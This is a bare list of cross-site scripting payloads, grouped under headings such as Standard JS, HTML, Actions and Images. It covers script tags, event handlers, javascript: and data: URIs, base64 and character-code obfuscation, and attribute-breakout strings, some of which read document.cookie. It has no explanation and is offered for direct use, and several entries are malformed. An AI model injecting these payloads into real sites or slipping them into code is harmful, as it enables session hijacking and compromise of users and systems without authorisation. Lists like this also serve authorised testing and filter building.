XSS String - Standard JS
'<script>alert("XSS");</script>',
'<img src=x onerror=alert("XSS")>',
'<iframe src="javascript:alert(`XSS`)">',
"<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
'<img src="javascript:alert(`XSS`)">',
'<video><source onerror="javascript:alert(`XSS`)" />',
'<audio><source onerror="javascript:alert(`XSS`)" />',
'<img src="1" onerror="alert(document.domain)" />',
'<img src="1" onerror="prompt(document.cookie)" />',
"<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>",
'<img src=x onerror="prompt(/xss/.source)"/>',
'<script>top.window.location.href="javascript:alert(`XSS`)";</script>',
'<meta http-equiv="refresh" content="0;javascript:alert(`XSS`)" />',
'<body onpageshow="javascript:alert(`XSS`)">',
'<body onload="javascript:alert(`XSS`)">',
'<img src=x:x onerror="alert(`XSS`)">',
'<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" />',
'<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" type="text/x-scriptlet" />',
HTML
'<body onload=alert("XSS")>',
'<svg><script>alert("XSS")</script></svg>',
'<iframe src="javascript:alert(`XSS`)">',
'<input value="javascript:alert(`XSS`)" />',
'<textarea><script>alert("XSS");</script></textarea>',
'<plaintext><script>alert("XSS");</script></plaintext>',
'<title><script>alert("XSS");</script></title>',
"<iframe srcdoc='<img src=\"javascript:alert(`XSS`)\">'></iframe>",
"<body '<img src="1" onerror="prompt(document.cookie)" />',
'<marquee><script>alert("XSS");</script></marquee>',
'<style>/*]]>*/</style><script>alert("XSS")</script>',
'<input type="image" src="x" onerror="alert(`XSS`)"/>',
'<base href="javascript:alert(`XSS`)"/>',
'<object data="javascript:alert(`XSS`)"></object>',
Actions
'"><script>alert("XSS")</script>',
'"><img src=x onerror=alert("XSS")>',
'" autofocus onfocus=alert("XSS")><input type="hidden">',
'" onclick=alert("XSS)//',
'" ondblclick=alert("XSS")>',
'" onfocus=alert(document.domain)><input type="hidden">',
'"><img src=x onerror=alert(document.domain)>',
'"><img src=x oneonerrorrror=alert("XSS")>',
'"><svg><style><img src="</style><img src=x onerror=alert("XSS")>">',
'" onmouseover=alert("XSS")><img src="',
'" onmouseout=alert(String.fromCharCode(88,83,83))> ',
'"><img src=x:x onerror=window.alert("XSS");>',
'"><iframe src=javascript:alert("XSS")></iframe>',
'"><form id=form1 name=form1 onsubmit=alert("XSS");><input type=submit></form><script>form1.submit()</script>',
'<img src="javascript:alert(`XSS`)" onload="alert(`XSS`)" />',
Images
``js
'"><svg><script>alert("XSS")</script></svg>',
'<svg onload=alert("XSS")>',
'<script type="text/javascript"><![CDATA[alert("XSS");]]></script>',
'<svg><script xlink:href="javascript:alert(XSS)"></script></svg>',
'<style><img src="</style><img src=x onerror=alert(XSS)>">',
'<polygon points="1" onmousemove="alert(XSS)"/>',
'<path d="M0,0 L0,1" onmousemove="alert(XSS)"/>',
'<animate attributeName="xlink:href" values="javascript:alert(XSS`)" />',
```